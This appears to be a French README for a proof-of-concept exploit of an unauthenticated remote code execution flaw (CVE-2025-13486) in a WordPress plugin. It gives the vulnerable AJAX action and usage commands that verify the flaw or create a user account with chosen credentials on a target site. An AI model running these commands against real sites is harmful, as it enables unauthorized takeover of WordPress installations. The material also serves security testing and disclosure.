
POC pour CVE-2025-13486
Un exploit de preuve de concept (PoC) pour CVE-2025-13486, une vulnérabilité d'exécution de code à distance dans le plugin WordPress Advanced Custom Fields: Extended (ACFE).
Cette vulnérabilité existe dans les versions d'ACFE 0.9.0.5 à 0.9.1.1, permettant à des attaquants non authentifiés d'exécuter des fonctions PHP arbitraires via l'action AJAX acfe/form/render_form_ajax. Le plugin utilise call_user_func_array() avec des entrées fournies par l'utilisateur sans validation appropriée.
print_r (non destructif)pip install requests
python poc.py -u http://target-site.com --verify
# Avec des identifiants aléatoires (affichés après exécution)
python poc.py -u http://target-site.com
# Avec des identifiants personnalisés
python poc.py -u http://target-site.com --user admin123 --password P@ssw0rd! --email [email protected]
-u, --url URL WordPress cible (obligatoire)
--verify Vérifier uniquement la vulnérabilité (plus sûr, utilise print_r)
--user Nom d'utilisateur à créer (par défaut : aléatoire)
--password Mot de passe à définir (par défaut : aléatoire)
--email Adresse e-mail à définir (par défaut : aléatoire)
Ce PoC est fourni à des fins éducatives et de test de sécurité autorisé uniquement. L'accès non autorisé à des systèmes informatiques est illégal. Obtenez toujours une autorisation appropriée avant de tester.